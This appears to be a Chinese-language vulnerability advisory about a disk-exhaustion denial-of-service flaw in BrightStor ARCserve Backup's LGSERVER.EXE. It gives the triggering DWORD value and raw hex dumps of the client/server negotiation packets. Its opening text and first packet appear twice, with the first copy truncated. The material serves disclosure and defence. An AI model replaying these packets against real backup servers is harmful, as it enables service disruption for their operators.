VULHUB ™

BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。 BrightStor ARCserve Backup在处理用户请求时存在漏洞，远程攻击者可能利用此漏洞导致服务器消耗大量磁盘资源。 每次用户试图验证到LGSERVER.EXE都会在D：＼CA_BABLDdata＼Server＼data＼transfer中创建一个文件。该文件扩展名为.USX，格式类似于RWXXX.usx，其中X为0-9或A-F的值。 在协商期间16进制地址(DWORD)0x15到0x18上的第三个报文中值为0x00 0x00 0x00 0x00，然后是CoreDataDB。如果发送了这个报文，就会将上述内容写入到这个USX文件。但如果在0x15到0x18地址所传送的DWORD值为0xff 0xff 0xff 0x7f，就会向USX文件中写入额外2,096,153KB的NULL，导致拒绝服务。 以下为会话示例： 客户端报文1 Raw Data 4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00...

BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。 BrightStor ARCserve Backup在处理用户请求时存在漏洞，远程攻击者可能利用此漏洞导致服务器消耗大量磁盘资源。 每次用户试图验证到LGSERVER.EXE都会在D：＼CA_BABLDdata＼Server＼data＼transfer中创建一个文件。该文件扩展名为.USX，格式类似于RWXXX.usx，其中X为0-9或A-F的值。 在协商期间16进制地址(DWORD)0x15到0x18上的第三个报文中值为0x00 0x00 0x00 0x00，然后是CoreDataDB。如果发送了这个报文，就会将上述内容写入到这个USX文件。但如果在0x15到0x18地址所传送的DWORD值为0xff 0xff 0xff 0x7f，就会向USX文件中写入额外2,096,153KB的NULL，导致拒绝服务。 以下为会话示例： 客户端报文1 Raw Data 4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 ( ) 服务端 Raw Data 4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 00 00 00 00 ( ) 服务端 Raw Data 4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 00 00 00 00 ( ) 客户端报文2 Raw Data 4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00 (N=, ) 06 00 00 00 ce 03 00 00 52 57 31 42 34 00 ( RW1B4 ) 服务端 Raw Data 4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 00 00 00 00 ( ) 客户端报文3 Raw Data 4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00 (N=, ) ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61 ( CoreData) 44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00 (DB ) 00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00 ( J ) 00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( J ) 00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00 ( J P ) 00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R ) 00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00 ( ) 00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R ) 00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00 ( B ) 00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00 ( N ) 00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00 ( b ) 00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00 ( f ) 00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00 ( x ) 00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00 ( | ) 00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00 ( ) 00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00 ( ) 00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00